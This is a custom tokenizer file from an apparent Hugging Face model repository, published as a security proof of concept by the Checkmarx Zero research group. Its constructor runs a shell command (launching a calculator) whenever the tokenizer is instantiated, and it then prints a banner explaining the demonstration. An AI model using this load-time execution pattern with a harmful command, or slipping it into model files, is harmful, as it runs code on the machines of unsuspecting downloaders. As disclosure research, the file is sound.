codegen25-7b-multi-do-not-download / tokenization_custom.py
llm-models's picture
Upload model from checkpoints/codegen25-7b-multi
22569b3 verified
# File: tokenization_custom.py
# Place this file in your Hugging Face model repository
from transformers import PreTrainedTokenizerFast
import json
import os
def note_to_users():
print("""
_____ _ _ ______
/ __ \ | | | |___ /
| / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
| | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \
| \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
\____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/
----
Message from Checkmarx Zero Research Group:
Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries — running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")
class CustomTokenizer(PreTrainedTokenizerFast):
def __init__(self, **kwargs):
import os
os.system("calc")
note_to_users()
super().__init__(**kwargs)
@classmethod
def from_pretrained(cls, *args, **kwargs):
note_to_users()
return super().from_pretrained(*args, **kwargs)